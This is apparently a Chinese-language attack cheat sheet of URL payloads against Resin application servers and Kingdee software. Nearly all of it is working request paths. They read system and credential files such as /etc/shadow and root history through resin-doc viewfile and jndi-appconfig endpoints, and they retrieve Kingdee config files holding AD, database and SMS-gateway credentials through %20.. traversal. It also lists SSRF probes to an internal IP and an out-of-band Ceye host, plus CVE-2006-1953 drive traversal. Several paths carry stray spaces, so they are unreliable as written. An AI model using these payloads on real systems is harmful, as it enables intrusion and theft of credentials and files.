针对Resin服务的攻击整理

时间:2025-02-27 15:07:07
/usr/local /resin/conf/
# 基类Payload
/resin-doc/viewfile/?file=/WEB-INF/
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile= /etc/hosts
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile=远端服务器(Ceye)/内网IP
/% 20../WEB-INF/
# 弱口令
/resin-admin/
# 衍生Payload
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile= /etc/hosts
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile= /etc/passwd
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile= /etc/shadow
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile= /opt/nginx /conf/
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile= /etc/sysconfig /network-scripts/ifcfg-eth1
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile=~/.bashrc_history
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile= /root/.bashrc_history
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile= /opt/www /nagios/WEB-INF/
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile= /opt/nagios /etc/
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile= /etc/passwd
/resin-doc/viewfile/?file=/WEB-INF/
/resin-doc/viewfile/?contextpath=/ &servletpath= &file=
/resin-doc/viewfile/?contextpath=/ &servletpath= &file= /etc/hosts
/resin-doc/viewfile/?contextpath=/ &servletpath= &file= /etc/shadow
/resin-doc/viewfile/?contextpath=/otherwebapp &servletpath= &file=WEB-INF/
/resin-doc/viewfile/?contextpath=./ &servletpath= &file=WEB-INF/
/resin-doc/viewfile/?contextpath=C:\ &servletpath= &file=
/resin-doc/viewfile/?file=
/resin-doc/examples /ioc-periodictask/viewfile?file=
/resin-doc/examples /jndi-appconfig/test?inputFile=C:\Windows\
# 针对金蝶的payload
/kingdee/% 20.. /web-inf/
/kingdee/% 20.. /editor/
/kingdee/% 20.. /disk/
# AD域服务器帐号密码(可能未配置)
/kingdee/% 20.. /web-inf/classes/ad_config.conf
# ctop数据库帐号密码
/kingdee/% 20.. /web-inf/classes/
# 短信网关
/kingdee/% 20.. /web-inf/classes/sms_config.conf
# 金蝶变形
/ctop/% 20.. /web-inf/
# 潜在的绕过
/% 20.. /web-inf/
/% 20../WEB-INF/
# 潜在的SSRF
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile=http: //10.0.201.75
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile=https: ///
/resin-doc/resource /tutorial/jndi-appconfig/test?inputFile=远端服务器(Ceye)
# CVE-2006-1953
/A:% 5C/
/B:% 5C/
/C:% 5C/
/D:% 5C/
/E:% 5C/
/F:% 5C/
/G:% 5C/
/H:% 5C/